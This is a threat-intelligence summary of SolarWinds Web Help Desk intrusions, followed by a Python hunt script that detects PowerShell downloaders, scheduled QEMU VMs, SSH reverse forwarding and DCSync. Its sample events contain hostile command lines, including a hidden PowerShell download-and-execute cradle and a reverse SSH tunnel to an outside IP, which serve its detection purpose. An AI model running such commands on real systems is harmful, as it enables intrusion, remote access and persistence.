Microsoft observed December 2025 intrusions in which attackers used internet-exposed SolarWinds Web Help Desk (WHD) instances to run PowerShell and download additional payloads, possibly exploiting recently patched WHD vulnerabilities as zero-days. The adversaries then established persistence and domain-level access: ManageEngine RMM for remote control, SSH port forwarding to tunnel reverse SSH/RDP sessions, scheduled QEMU VMs and DLL sideloading to survive on hosts, and DCSync to steal domain credentials. #SolarWindsWHD #ManageEngine
Keypoints
- Attackers targeted internet-exposed SolarWinds Web Help Desk instances for initial access.
- Microsoft could not definitively confirm which CVE—CVE-2025-40551, CVE-2025-40536, or CVE-2025-26399—was used.
- PowerShell was used to download and execute additional payloads after initial compromise.
- Adversaries deployed ManageEngine RMM, created scheduled QEMU VMs, used SSH port forwarding and DLL sideloading, and performed DCSync to steal credentials.
- Organizations are advised to patch WHD, remove unauthorized RMM tools, rotate credentials, and isolate compromised hosts immediately.
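The behaviours listed above map to a handful of hunt rules. The script below is an added example, not code from Microsoft's or SecurityWeek's reporting: it runs four rules over a constructed, simplified set of process-creation (Sysmon 1 / Security 4688 style) and directory-service-access (Security 4662) records. It assumes that WHD runs inside a Tomcat-hosted JVM, so its process image is `java.exe`; the host names, account names, IPs and the `KNOWN_REPLICATORS` allowlist are all made up for the example.

```python
"""Hunt rules for the WHD intrusion chain: WHD spawning PowerShell downloaders,
scheduled QEMU VMs, SSH reverse port forwarding, and DCSync.
Event records below are constructed for this example, not real telemetry."""
import re
from dataclasses import dataclass

# PowerShell download/decode primitives worth flagging when the parent is WHD.
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|FromBase64String|-enc\w*\s",
    re.IGNORECASE,
)
# Well-known control-access-right GUIDs that DCSync requests (seen in 4662).
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Assumption: WHD's Tomcat runs under java.exe, so that is the parent to watch.
WHD_PARENTS = {"java.exe"}
# Constructed allowlist: domain controllers and other legitimate replicators.
KNOWN_REPLICATORS = {"CORP\\DC02$"}

# Constructed sample events (id 1 = process creation, id 4662 = DS object access).
EVENTS = [
    {"id": 1, "host": "whd01", "parent": "java.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
            ".DownloadString('http://198.51.100.7/a.ps1')"},
    {"id": 1, "host": "srv02", "parent": "svchost.exe", "image": "schtasks.exe",
     "cmd": 'schtasks /create /tn "Updater" /sc onstart /tr '
            '"C:\\ProgramData\\q\\qemu-system-x86_64.exe -hda d.qcow2 -netdev user,id=n0"'},
    {"id": 1, "host": "srv02", "parent": "cmd.exe", "image": "ssh.exe",
     "cmd": "ssh.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10"},
    {"id": 4662, "host": "dc01", "subject": "CORP\\svc_helpdesk",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "host": "dc01", "subject": "CORP\\DC02$",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 1, "host": "ws05", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe Get-Process"},
]


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def hunt(events):
    """Apply the four rules and return findings in event order."""
    findings = []
    for e in events:
        if e["id"] == 1:
            image = e["image"].lower()
            cmd = e["cmd"]
            # Rule 1: the WHD process itself launching a PowerShell downloader.
            if (e["parent"].lower() in WHD_PARENTS and image == "powershell.exe"
                    and DOWNLOAD_RE.search(cmd)):
                findings.append(Finding("whd_spawns_powershell_download", e["host"], cmd))
            # Rule 2: a scheduled task that boots a QEMU VM (hidden attacker workstation).
            if image == "schtasks.exe" and "/create" in cmd.lower() and "qemu" in cmd.lower():
                findings.append(Finding("scheduled_qemu_vm", e["host"], cmd))
            # Rule 3: ssh with -R, i.e. a remote (reverse) port forward exposing RDP.
            if image == "ssh.exe" and re.search(r"\s-R\s", cmd):
                findings.append(Finding("ssh_reverse_forward", e["host"], cmd))
        elif e["id"] == 4662:
            # Rule 4: replication rights requested by anything not on the allowlist.
            guids = set(re.findall(r"[0-9a-f-]{36}", e["properties"].lower()))
            if guids & DCSYNC_GUIDS and e["subject"] not in KNOWN_REPLICATORS:
                findings.append(Finding("possible_dcsync", e["host"], e["subject"]))
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Rule 4 deliberately uses an explicit allowlist rather than "subject ends with `$`": Azure AD Connect and backup service accounts replicate legitimately, and an attacker can DCSync with a compromised machine account. Rule 1 is the one to tune first, since any WHD plugin or admin script launched from Tomcat will trip it; the parent-process assumption should be checked against your own WHD deployment.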
Read More: https://www.securityweek.com/recent-solarwinds-flaws-potentially-exploited-as-zero-days/